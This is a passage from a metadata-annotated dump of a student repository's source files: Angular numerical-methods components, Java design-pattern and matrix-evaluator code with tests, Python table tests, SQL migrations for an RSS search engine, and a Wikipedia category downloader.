'integration/trapezoid',\n component: TrapezoidComponent,\n data: {\n name: 'Складена квадратурна формула трапецій'\n }\n}, {\n path: 'integration/romberg',\n component: RombergComponent,\n data: {\n name: 'Алгоритм Ромберга'\n }\n}];\n" }, { "alpha_fraction": 0.5976470708847046, "alphanum_fraction": 0.6058823466300964, "avg_line_length": 22.61111068725586, "blob_id": "5a03665751b4979580d3d1ccaaf83daa72c08b0b", "content_id": "6e9b765582bef77ac34e7b79560b4d45fa2eab34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 850, "license_type": "no_license", "max_line_length": 75, "num_lines": 36, "path": "/numerical-methods/src/app/csv.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import * as Papa from 'papaparse'\n\nexport function decodeCsv(csvSrc): {x: number, y: number}[] {\n const data = Papa.parse(csvSrc);\n if(data.errors.length != 0) {\n console.log(data.errors);\n throw new Error(\"Can't parse\");\n }\n\n const arr: any[] = data.data;\n\n const map = arr\n .filter(c=>c.length == 2)\n .map(el=>({x: Number.parseFloat(el[0]), y: Number.parseFloat(el[1])}));\n\n map.forEach(el=>{\n if(isNaN(el.x) || isNaN(el.y))\n throw new Error(\"Not a number\")\n });\n\n return map;\n}\n\nexport function getControls(csvSrc: string): number[] {\n const data = Papa.parse(csvSrc);\n if(data.errors.length != 0){\n console.log(data.errors);\n throw new Error(\"Can't parse\")\n }\n\n return data.data.filter(e=>e.length != 0)[0].map(e=>{\n const r = parseFloat(e);\n if(isNaN(r)) throw new Error(\"Nan\");\n return r;\n });\n}\n" }, { "alpha_fraction": 0.6048387289047241, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 19.66666603088379, "blob_id": "9a605a42e27c75efdb0db06f8962edfed30e1df9", "content_id": "6eca772f1467b29f4eee49e4c01cea35eaccdb8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", 
"length_bytes": 496, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/cg/cg-lab6/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'cglabs'\nversion '1.0-SNAPSHOT'\n\napply plugin: 'java'\n\nsourceCompatibility = 1.8\n\nrepositories {\n mavenCentral()\n\n maven {\n url \"http://nexus.talanlabs.com/content/repositories/releases/\"\n }\n}\n\ndependencies {\n compile group: 'java3d', name: 'j3dcore', version: '1.5.2'\n compile group: 'java3d', name: 'j3dutils', version: '1.5.2'\n compile group: 'javax.vecmath', name: 'vecmath', version: '1.5.2'\n\n\n\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.6331025958061218, "alphanum_fraction": 0.6551290154457092, "avg_line_length": 20.76712417602539, "blob_id": "7896d64b661d806c7e77b43333794d0c697e7b15", "content_id": "8ed3a8a08c74ec8fe6dcd76e1435676b1d3479d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3178, "license_type": "no_license", "max_line_length": 63, "num_lines": 146, "path": "/db/lab1/test.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.data import Table, Attribute, autoinc\n\n# Tables can have attributes\nt = Table(Attribute(\"Check\"))\n\n# Tables default is used\nv = Attribute(\"lol\", default=autoinc)\nt = Table(Attribute(\"some\", default=autoinc()))\nt.add(**{})\nt.add(**{})\nr = t.find()\nassert len(r)==2\nassert r[0]['some'] == 1\nassert r[1]['some'] == 2\n\n# Tables must have at least one attribute\ntry:\n t = Table()\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't have duplicate attribute names\ntry:\n t = Table(Attribute(\"a\"), Attribute(\"a\"))\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't give reference to non-existent field\ntry:\n t = Table(Attribute(\"foo\"))\n r = t.reference(\"bar\")\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't give reference to non-unique field\ntry:\n t = Table(Attribute(\"foo\", unique=False))\n r = t.reference(\"foo\")\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't bee searched by non-existent attributes\ntry:\n t = Table(Attribute(\"foo\"))\n x = t.find(bar= 42)\n assert False\nexcept ValueError:\n assert True\n\n# Added rows can be found\nt = Table(Attribute(\"x\"), Attribute(\"y\"))\nt.add(x=1, y=3)\nt.add(x=2, y=4)\nl = t.find(x=2)\nassert len(l) == 1\nassert l[0]['y'] == 4\n\n\n# Unique attribute can't be dublicated\ntry:\n t = Table(Attribute(\"foo\", unique=True))\n t.add(foo=42)\n t.add(foo=42)\n assert False\nexcept ValueError:\n assert True\n\n# Reference existence is checked\ntry:\n a = Table(Attribute(\"foo\", unique=True))\n b = Table(Attribute(\"a_foo\", reference=a.reference(\"foo\")))\n b.add(a_foo=42)\n assert False\nexcept ValueError:\n assert True\n\n# Reference existence is positively checked\na = Table(Attribute(\"foo\", unique=True))\nb = Table(Attribute(\"a_foo\", reference=a.reference(\"foo\")))\na.add(foo=42)\nb.add(a_foo=42)\n\n\n# Can't modify referenced row\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"foo_ref\", reference = t.reference(\"foo\")))\nt.add(foo=1)\nt.add(foo=15)\nd.add(foo_ref=1)\nt.check_modify(t.find(foo=15)[0], t.attributes[\"foo\"])\ntry:\n t.check_modify(t.find(foo=1)[0], t.attributes[\"foo\"])\n assert False\nexcept ValueError:\n assert True\n\n\n# Update updates all needed rows\nt = Table(Attribute(\"a\"), Attribute(\"b\"))\nt.add(a=1, 
b=2)\nt.add(a=1, b=4)\nt.add(a=2, b=0)\nt.update(t.find(a=1), b=\"updated\")\nr = t.find(a=1)\nassert len(r) == 2\nassert r[0][\"b\"] == r[1][\"b\"] == \"updated\"\nassert t.find(a=2)[0][\"b\"] == 0\n\n\n# Can't update referenced fields\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"foo_ref\", reference=t.reference(\"foo\")))\nt.add(foo=42)\nt.update(t.find(foo=42), foo=24)\nd.add(foo_ref=24)\ntry:\n t.update(t.find(foo=24), foo=1)\n assert False\nexcept ValueError:\n assert True\n\n\n# Can delete\nt = Table(Attribute(\"foo\"))\nt.add(foo=1)\nt.delete(t.find(foo=1))\nassert len(t.find()) == 0\n\n# Can't delete referenced\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"lol\", reference = t.reference(\"foo\")))\nt.add(foo=1)\nt.add(foo=2)\nd.add(lol=1)\nd.add(lol=2)\nd.delete(d.find(lol=2))\nt.delete(t.find(foo=2))\ntry:\n t.delete(t.find(foo=1))\n assert False\nexcept ValueError:\n assert True\n" }, { "alpha_fraction": 0.5925233364105225, "alphanum_fraction": 0.6168224215507507, "avg_line_length": 34.66666793823242, "blob_id": "19a63f4cd89179635df45fd64c7cbeb23e08c26c", "content_id": "6a3a0c308293193b809c134c5d81ed2e0900a668", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 72, "num_lines": 30, "path": "/scsearch/src/main/resources/db/migration/V1__initial_tables.sql", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "CREATE TABLE rss_feed (\n id BIGINT PRIMARY KEY AUTO_INCREMENT NOT NULL,\n url VARCHAR(200) UNIQUE NOT NULL,\n link VARCHAR(200) NOT NULL,\n title VARCHAR(300) NOT NULL,\n description VARCHAR(1000) NOT NULL,\n last_update TIMESTAMP NOT NULL DEFAULT(CURRENT_TIMESTAMP())\n);\n\nCREATE TABLE rss_item (\n id BIGINT PRIMARY KEY AUTO_INCREMENT NOT NULL,\n title VARCHAR(300),\n link VARCHAR(200),\n description TEXT,\n td_length DOUBLE NOT NULL,\n feed_id BIGINT NOT NULL REFERENCES rss_feed (id),\n pub_time TIMESTAMP NOT NULL DEFAULT(CURRENT_TIMESTAMP())\n);\n\nCREATE TABLE term (\n value VARCHAR(200) PRIMARY KEY NOT NULL,\n document_frequency BIGINT NOT NULL DEFAULT 0\n);\n\nCREATE TABLE rss_item_terms (\n rss_item_id BIGINT REFERENCES rss_item (id),\n term_value VARCHAR(200) REFERENCES term (value),\n usages INT NOT NULL,\n CONSTRAINT rss_item_term_value_unique UNIQUE (rss_item_id, term_value)\n);\n" }, { "alpha_fraction": 0.7277734279632568, "alphanum_fraction": 0.7277734279632568, "avg_line_length": 26.042552947998047, "blob_id": "4aff957043a7ab9b8e84d74b614ed85667bb4a0d", "content_id": "d8bd67def15dd72aeba0ea35642dafa9290a5cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1271, "license_type": "no_license", "max_line_length": 91, "num_lines": 47, "path": "/insurance/frontend/src/app/supporter-consultation/supporter-consultation.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {ClientInfo, SupporterConsultationService} from '../supporter-consultation.service';\nimport {isUndefined} from 'util';\n\n@Component({\n selector: 'app-supporter-consultation',\n templateUrl: './supporter-consultation.component.html',\n styleUrls: ['./supporter-consultation.component.css']\n})\nexport class SupporterConsultationComponent implements OnInit {\n constructor(public consultation: SupporterConsultationService) { }\n message: string = \"\";\n\n get clients(): ClientInfo[] {\n const res 
= [];\n for(let key in this.consultation.clients)\n res.push(this.consultation.clients[key])\n return res;\n }\n\n get currentMessages(){\n if(isUndefined(this.consultation.selectedClient)) return [];\n return this.consultation.clients[this.consultation.selectedClient].messages\n }\n\n selectClient(clientId: string){\n this.consultation.selectClient(clientId);\n this.consultation.clients[clientId].hasNewMessages = false;\n }\n\n assignClient(id: string){\n this.consultation.assignClient(id)\n }\n\n unassignClient(id: string){\n this.consultation.unassignClient(id)\n }\n\n answer(){\n this.consultation.writeAnswer(this.message);\n }\n\n ngOnInit() {\n this.consultation.refreshFree();\n }\n\n}\n" }, { "alpha_fraction": 0.6691498756408691, "alphanum_fraction": 0.6818580031394958, "avg_line_length": 31.140844345092773, "blob_id": "af865a8a7f0b56b5163c458e0953b123166cf3d1", "content_id": "ae816132c55c89ed70debf5f6097d77e167bf8ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2282, "license_type": "no_license", "max_line_length": 101, "num_lines": 71, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab5/task2/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab5.task2;\n\nabstract class ObservatoryColleague {\n public final String name;\n protected ObservatoryMediator mediator;\n protected String starName;\n public ObservatoryColleague(String name, ObservatoryMediator mediator) {\n this.name = name;\n this.mediator = mediator;\n }\n\n public void trackStar(String name) {\n this.starName = name;\n }\n\n public void sendStarData() {\n mediator.receiveStarData(starName, this);\n }\n}\n\nclass ConcreteObservatory extends ObservatoryColleague {\n public ConcreteObservatory(ObservatoryMediator mediator, String name) {\n super(name, mediator);\n }\n\n @Override\n public void trackStar(String name) {\n System.out.println(this.name + \" starts tracking \" + name);\n super.trackStar(name);\n }\n\n}\n\nabstract class ObservatoryMediator {\n abstract public void receiveStarData(String name, ObservatoryColleague colleague);\n}\n\nclass ConcreteObservatoryMediator extends ObservatoryMediator {\n private ObservatoryColleague observatory1 = new ConcreteObservatory(this, \"Eastern Observatory\");\n private ObservatoryColleague observatory2 = new ConcreteObservatory(this, \"Western Observatory\");\n\n @Override\n public void receiveStarData(String name, ObservatoryColleague colleague) {\n System.out.println(\"Received info about \" + name + \" from \" + colleague.name);\n }\n\n\n public void watch(String star) {\n System.out.println(\"########### We need to track \" + star + \" today ########\");\n\n System.out.println(\"Can watch \" + star + \" from 00:00 to 12:00 from \" + observatory1.name);\n observatory1.trackStar(star);\n observatory1.sendStarData();\n observatory1.sendStarData();\n System.out.println();\n\n System.out.println(\"Can watch \" + star + \" from 12:00 to 23:59 from \" + observatory2.name);\n observatory2.trackStar(star);\n observatory2.sendStarData();\n observatory2.sendStarData();\n System.out.println();\n }\n}\n\npublic class Application {\n public static void main(String... 
args) {\n ConcreteObservatoryMediator mediator = new ConcreteObservatoryMediator();\n mediator.watch(\"Sirius\");\n mediator.watch(\"Aldebaran\");\n }\n}\n" }, { "alpha_fraction": 0.48450136184692383, "alphanum_fraction": 0.5384097099304199, "avg_line_length": 28.703447341918945, "blob_id": "8cf65ad7d5f6861d93fae600e52deb93b7f6748c", "content_id": "786e1ffabe0761919ff561604ea2296ef275cce8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4452, "license_type": "no_license", "max_line_length": 115, "num_lines": 145, "path": "/otp/src/test/java/io/github/k_gregory/otp/lab2/EvalutionsTests.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2;\r\n\r\nimport Jama.Matrix;\r\nimport io.github.k_gregory.otp.lab1.ParseException;\r\nimport io.github.k_gregory.otp.lab2.datatypes.MathVal;\r\nimport io.github.k_gregory.otp.lab2.datatypes.NumVal;\r\nimport io.github.k_gregory.otp.lab2.datatypes.VectorVal;\r\nimport org.junit.Test;\r\n\r\nimport java.util.Arrays;\r\n\r\nimport static org.junit.Assert.assertEquals;\r\n\r\npublic class EvalutionsTests {\r\n\r\n private MathVal calculate(String expression) {\r\n return new MatrixEvalutor().evalute(expression);\r\n }\r\n\r\n private void assertCalculate(MathVal expected, String expression) {\r\n assertEquals(expected, calculate(expression));\r\n }\r\n\r\n private void assertNumVal(Double v, String expression) {\r\n assertCalculate(new NumVal(v), expression);\r\n }\r\n\r\n private void assertNumVecVal(String expression, Double... doubles) {\r\n assertCalculate(new VectorVal(Arrays.stream(doubles).map(NumVal::new).toArray(NumVal[]::new)), expression);\r\n }\r\n\r\n @Test(expected = ParseException.class)\r\n public void bracketsMatch() {\r\n calculate(\"1+[[13]\");\r\n }\r\n\r\n @Test(expected = ParseException.class)\r\n public void noExtraParsed() {\r\n calculate(\"1+2 ololo some\");\r\n }\r\n\r\n @Test\r\n public void memoryDurability() {\r\n MatrixEvalutor evalutor = new MatrixEvalutor();\r\n evalutor.evalute(\"c=42\");\r\n assertEquals(new NumVal(2.d), evalutor.evalute(\"c-40\"));\r\n }\r\n\r\n @Test\r\n public void spacesAreAllowed() {\r\n assertNumVal(2.d, \"1 + 1\");\r\n assertNumVal(5.d, \" a = 1 ; 4 + a ;\");\r\n }\r\n\r\n @Test\r\n public void simpleAlgebra() {\r\n assertNumVal(4.d, \"2+2;\");\r\n assertNumVal(1.d, \"1+0\");\r\n assertNumVal(1.d, \"0+1\");\r\n assertNumVal(5.d, \"10/2\");\r\n assertNumVal(3.d, \"6-(2+2)/2-1;\");\r\n\r\n assertNumVal(5.d, \"|-5|\");\r\n }\r\n\r\n @Test\r\n public void vectorAlgebra() {\r\n assertNumVecVal(\"[1]+[0]\", 1.d);\r\n assertNumVecVal(\"[0]+[1]\", 1.d);\r\n assertNumVecVal(\"[-5,2,15]x[6,1,-2]\", -19.d, 80.d, -17.d);\r\n }\r\n\r\n @Test\r\n public void assignment() {\r\n assertNumVal(4.d, \"a=4\");\r\n assertNumVal(5.d, \"a=5;a;\");\r\n assertNumVal(32.d, \"a=3;b=7;c=a+b;c/5+c*3\");\r\n assertNumVecVal(\"[0]\", 0.d);\r\n assertNumVecVal(\"a=[1,2];b=[0,-4];c=a+b\", 1.d, -2.d);\r\n }\r\n\r\n @Test\r\n public void vectorAssignment() {\r\n assertNumVecVal(\"[1]\", 1.d);\r\n assertNumVecVal(\"[1,2]\", 1.d, 2.d);\r\n assertNumVecVal(\"[-1]\", -1.d);\r\n }\r\n\r\n @Test\r\n public void vectorScalar() {\r\n assertNumVecVal(\"[1,2,3]*2\", 2.d, 4.d, 6.d);\r\n assertNumVecVal(\"1/10*[10,20,30]\", 1.d, 2.d, 3.d);\r\n assertNumVecVal(\"1/10*[10,-20,30]\", 1.d, -2.d, 3.d);\r\n }\r\n\r\n @Test\r\n public void nestedVectors() {\r\n assertCalculate(new VectorVal(new VectorVal(new NumVal(1.d))), \"[[1]]\");\r\n 
assertNumVal(6.5, \"[[0.5]]*[[13]]\");\r\n assertCalculate(new VectorVal(new VectorVal(new NumVal(-4.d))), \"[[1]]+[[-5]]\");\r\n assertNumVal(40.d, \"[([1,2]*[2,3]),4]*[3,4]\");\r\n assertNumVecVal(\"[1,2,3]x[1,rank([[1,2],[3,4]]),1]\", -4.d, 2.d, 0.d);\r\n }\r\n\r\n @Test\r\n public void matrixTranspose() {\r\n Matrix matrix = new Matrix(new double[][]{{1, 2, 3}, {4, 5, 6}});\r\n assertCalculate(VectorVal.fromMatrix(matrix), \"[[1,4],[2,5],[3,6]]^t\");\r\n assertCalculate(VectorVal.fromMatrix(matrix).transpose(), \"[[1,4],[2,5],[3,6]]\");\r\n }\r\n\r\n @Test\r\n public void matrixInverse() {\r\n assertCalculate(VectorVal.fromMatrix(new Matrix(new double[][]{\r\n {1, 2},\r\n {3, 4}\r\n })), \"[[-2,1],[3/2,-1/2]]^1\");\r\n }\r\n\r\n @Test\r\n public void matrixMult() {\r\n assertCalculate(VectorVal.fromMatrix(new Matrix(new double[][]{\r\n {58, 64},\r\n {139, 154}\r\n })), \"[[1,2,3],[4,5,6]].[[7,8],[9,10],[11,12]]\");\r\n }\r\n\r\n @Test\r\n public void matrixRank() {\r\n assertNumVal(2.d, \"rank([[1,2,3],[4,5,6],[7,8,9]])\");\r\n }\r\n\r\n @Test\r\n public void matrixDet() {\r\n assertNumVal(-48.d, \"det([[1,2,3],[4,9,6],[7,8,9]])\");\r\n }\r\n\r\n @Test\r\n public void variant6() {\r\n assertCalculate(new VectorVal(\r\n new VectorVal(new NumVal(0.5), new NumVal(1.d)),\r\n new VectorVal(new NumVal(1.5), new NumVal(2.d))\r\n ), \"[[1,2],[3,4]]/rank([[1,2],[3,4]])\");\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7427785396575928, "alphanum_fraction": 0.7427785396575928, "avg_line_length": 29.29166603088379, "blob_id": "7b9795d0d9deb46a6b72f8274ae8e9a73e3f1470", "content_id": "f292cb248ffff097bf7d4541d2667a81403736bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 727, "license_type": "no_license", "max_line_length": 73, "num_lines": 24, "path": "/insurance/frontend/src/app/client-consultation/client-consultation.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {ClientConsultationService} from '../client-consultation.service';\nimport {SupportMessage} from '../../consultation/ConsultationMessage';\n\n@Component({\n selector: 'app-client-consultation',\n templateUrl: './client-consultation.component.html',\n styleUrls: ['./client-consultation.component.css']\n})\nexport class ClientConsultationComponent implements OnInit {\n currentMessage: string = \"\";\n messages: SupportMessage[];\n\n constructor(private consultation: ClientConsultationService) { }\n\n ngOnInit() {\n this.messages = this.consultation.messages;\n }\n\n addMessage(){\n this.consultation.writeQuestion(this.currentMessage);\n this.currentMessage=\"\";\n }\n}\n" }, { "alpha_fraction": 0.594936728477478, "alphanum_fraction": 0.597468376159668, "avg_line_length": 20.351350784301758, "blob_id": "b9ab6e0cf016fdd8b5e44855fb850f9b51774db3", "content_id": "05b73fe45af55ef315dd8af0e5fc8a366a03297c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 790, "license_type": "no_license", "max_line_length": 68, "num_lines": 37, "path": "/numerical-methods/src/app/romberg/romberg.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {romberg, RombergResult} from \"../romberg\";\nimport {f, h, l} from \"../f\";\n\n@Component({\n selector: 'app-romberg',\n templateUrl: './romberg.component.html',\n styleUrls: ['./romberg.component.css']\n})\nexport class 
RombergComponent implements OnInit {\n e: string = \"1e-9\";\n result?: RombergResult = null;\n error?: string;\n\n constructor() {}\n\n ngOnInit() {\n }\n\n calc(){\n const e = parseFloat(this.e);\n if(isNaN(e)){\n this.error = \"Can't parse accuracy\";\n return;\n }\n\n const res = romberg(f, l, h, e);\n this.result = res;\n\n const maxLen = Math.max.apply(null, res.table.map(e=>e.length));\n for(const a of res.table){\n for(let i = a.length; i < maxLen; i++)\n a.push(null)\n }\n }\n\n}\n" }, { "alpha_fraction": 0.621107280254364, "alphanum_fraction": 0.6435986161231995, "avg_line_length": 20.230770111083984, "blob_id": "843486c38c594796d7f9dc5247106981bfb6ab43", "content_id": "26a40c720a910c5d1809576b105baf9182a4a9f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 578, "license_type": "no_license", "max_line_length": 85, "num_lines": 26, "path": "/despat/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.bitbucket.gregoryk1'\r\nversion '1.0-SNAPSHOT'\r\n\r\napply plugin: 'java'\r\n\r\ntask fatJar(type: Jar) {\r\n\tmanifest {\r\n attributes 'Implementation-Title': 'Design patterns',\r\n \t'Implementation-Version': version\r\n }\r\n baseName = project.name + '-all'\r\n from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }\r\n with jar\r\n}\r\n\r\nsourceCompatibility = 1.8\r\ntargetCompatibility = 1.8\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\ndependencies {\r\n compile \"io.codearte.jfairy:jfairy:0.5.5\"\r\n testCompile \"junit:junit:4.12\"\r\n}\r\n" }, { "alpha_fraction": 0.6912878751754761, "alphanum_fraction": 0.6998106241226196, "avg_line_length": 28.171428680419922, "blob_id": "ed210b750bbac5639ca2b5000a77ebe82861e331", "content_id": "8899d75828230c89c983aaefeeaaffadd4371adf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/otp/src/test/java/io/github/k_gregory/otp/lab1/Task2Theories.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab1;\r\n\r\nimport io.github.k_gregory.otp.lab1.impl.StateFSM;\r\nimport org.junit.experimental.theories.DataPoint;\r\nimport org.junit.experimental.theories.Theories;\r\nimport org.junit.experimental.theories.Theory;\r\nimport org.junit.runner.RunWith;\r\n\r\nimport java.util.regex.Pattern;\r\n\r\nimport static org.junit.Assert.assertFalse;\r\nimport static org.junit.Assert.assertTrue;\r\nimport static org.junit.Assume.assumeFalse;\r\nimport static org.junit.Assume.assumeTrue;\r\n\r\n\r\n@RunWith(Theories.class)\r\npublic class Task2Theories {\r\n @DataPoint\r\n public static String matched = \"+330FIK\";\r\n @DataPoint\r\n public static String notMatched = \"+330FIk\";\r\n\r\n @Theory\r\n public void correctAccepted(String param) {\r\n assumeTrue(Pattern.matches(\"\\\\+\\\\d+[A-Z]*\", param));\r\n assertTrue(new StateFSM().match(param));\r\n }\r\n\r\n @Theory\r\n public void lowerCaseNotAccepted(String param) {\r\n assumeFalse(Pattern.matches(\"\\\\+\\\\d+[A-Z]*\", param));\r\n assertFalse(new StateFSM().match(param));\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6072449684143066, "alphanum_fraction": 0.6148713231086731, "avg_line_length": 18.979999542236328, "blob_id": "99fd2a6b5944c5b1ea1041fd181db08d880175a2", "content_id": "d6dc2885b446f6e4fcadb91bfb86caf3bd0d4bdc", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Java", "length_bytes": 1049, "license_type": "no_license", "max_line_length": 59, "num_lines": 50, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/entity/FeedItem.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader.entity;\r\n\r\nimport javax.persistence.Entity;\r\nimport javax.persistence.GeneratedValue;\r\nimport javax.persistence.GenerationType;\r\nimport javax.persistence.Id;\r\n\r\n/**\r\n * Created by grego on 13.05.2017.\r\n */\r\n@Entity\r\npublic class FeedItem {\r\n private Integer id;\r\n private String title;\r\n private String link;\r\n private String description;\r\n\r\n public String getTitle() {\r\n return title;\r\n }\r\n\r\n public void setTitle(String title) {\r\n this.title = title;\r\n }\r\n\r\n public String getLink() {\r\n return link;\r\n }\r\n\r\n public void setLink(String link) {\r\n this.link = link;\r\n }\r\n\r\n public String getDescription() {\r\n return description;\r\n }\r\n\r\n public void setDescription(String description) {\r\n this.description = description;\r\n }\r\n\r\n @Id @GeneratedValue(strategy = GenerationType.IDENTITY)\r\n public Integer getId() {\r\n return id;\r\n }\r\n\r\n public void setId(Integer id) {\r\n this.id = id;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7447229623794556, "alphanum_fraction": 0.7453826069831848, "avg_line_length": 34.25581359863281, "blob_id": "7a6928e1dfea5edddaa970903d44eaf208d9a1e5", "content_id": "3eb51543f644a00b945cf11c13d9fe64dd8244e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1516, "license_type": "no_license", "max_line_length": 100, "num_lines": 43, "path": "/numerical-methods/src/app/app.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\n\nimport { AppComponent } from './app.component';\nimport { BrowserAnimationsModule } from '@angular/platform-browser/animations';\nimport {MyMaterialModule} from \"./my-material/my-material.module\";\nimport { InterpolationComponent } from './interpolation/interpolation.component';\nimport { IntegrationComponent } from './integration/integration.component';\nimport {RouterModule, Routes} from \"@angular/router\";\nimport { NewtonSecondEvenlyComponent } from './newton-second-evenly/newton-second-evenly.component';\nimport { NewtonFirstComponent } from './newton-first/newton-first.component';\nimport { TrapezoidComponent } from './trapezoid/trapezoid.component';\nimport { RombergComponent } from './romberg/romberg.component';\nimport {routes} from \"./routes\";\nimport { FileInputComponent } from './file-input/file-input.component';\nimport {ChartsModule} from \"ng2-charts\";\nimport {FormsModule} from \"@angular/forms\";\n\n@NgModule({\n declarations: [\n AppComponent,\n InterpolationComponent,\n IntegrationComponent,\n NewtonSecondEvenlyComponent,\n NewtonFirstComponent,\n TrapezoidComponent,\n RombergComponent,\n FileInputComponent,\n ],\n imports: [\n RouterModule.forRoot(routes, {\n enableTracing: false\n }),\n BrowserModule,\n BrowserAnimationsModule,\n FormsModule,\n MyMaterialModule,\n ChartsModule\n ],\n providers: [],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n" }, { "alpha_fraction": 0.6477611660957336, "alphanum_fraction": 0.6507462859153748, "avg_line_length": 28.568628311157227, "blob_id": "29ea970c715026baf62a1803547ece338b9e0acc", 
"content_id": "c3356fc61a2574d8d705e9ce739c4d69b3b4d5fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3015, "license_type": "no_license", "max_line_length": 109, "num_lines": 102, "path": "/db/sem2/lab2/download_articles.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nfrom lxml import etree as ET\nimport pandas\n\n\nif len(sys.argv) != 3:\n sys.exit('Specify category name and output file name')\n\ncategory_name = sys.argv[1]\nroot_name = 'Category:' + category_name\n\n\nAPI_URL = 'https://en.wikipedia.org/w/api.php'\nMAX_SUBCATEGORIES = 2\nMAX_ARTICLES = 2\nMAX_DOWNLOAD_ARTICLES = 2\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef make_subcategory_query(category_name):\n return {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmtitle': 'Category:' + category_name,\n 'cmtype': 'subcat',\n 'cmlimit': MAX_SUBCATEGORIES\n }\n\n\ndef make_subcategory_articles_query(category_pageid):\n return {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmpageid': category_pageid,\n 'cmtype': 'page',\n 'cmlimit': MAX_ARTICLES\n }\n\n\nroot_category_articles_query = {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmtitle': root_name,\n 'cmtype': 'page',\n 'cmlimit': MAX_ARTICLES\n}\n\ndef make_pages_query(page_ids):\n id_list = '|'.join([str(x) for x in page_ids])\n return {\n 'action': 'query',\n 'format': 'xml',\n 'prop': 'revisions|categories',\n 'pageids': id_list,\n 'rvprop': 'content'\n }\n\n\ndef get_page_ids(category_name):\n subcategories_data = requests.get(API_URL, params=make_subcategory_query(category_name))\n subcategories = ET.fromstring(subcategories_data.content)\n\n for subcategory in subcategories.xpath('/api/query/categorymembers/cm'):\n subcategory_title = subcategory.get('title')\n subcategory_id = subcategory.get('pageid')\n subcategory_page_data = requests.get(API_URL, params=make_subcategory_articles_query(subcategory_id))\n subcategory_page = ET.fromstring(subcategory_page_data.content)\n for article_id in subcategory_page.xpath('/api/query/categorymembers/cm/@pageid'):\n yield (subcategory_title, article_id)\n\n direct_articles_data = requests.get(API_URL, params=root_category_articles_query)\n direct_articles = ET.fromstring(direct_articles_data.content)\n for article_id in direct_articles.xpath('/api/query/categorymembers/cm/@pageid'):\n yield (root_name, article_id)\n\n\ndef download_pages(page_ids):\n for ids_chunk in chunks(page_ids, MAX_DOWNLOAD_ARTICLES):\n page_data = requests.get(API_URL, params=make_pages_query(ids_chunk))\n page = ET.fromstring(page_data.content)\n yield from page.xpath('/api/query/pages/page')\n\n\ndata = list(get_page_ids(category_name))\ndf = pandas.DataFrame(data)\nunique_page_ids =df[1].unique()\nby_category = df.groupby(0)\n\n#Write pages to file\nxml_root = ET.Element('pages')\nfor page in download_pages(unique_page_ids):\n xml_root.append(page)\nwith open(sys.argv[2], 'wb') as f:\n f.write(ET.tostring(xml_root, pretty_print=True))" }, { 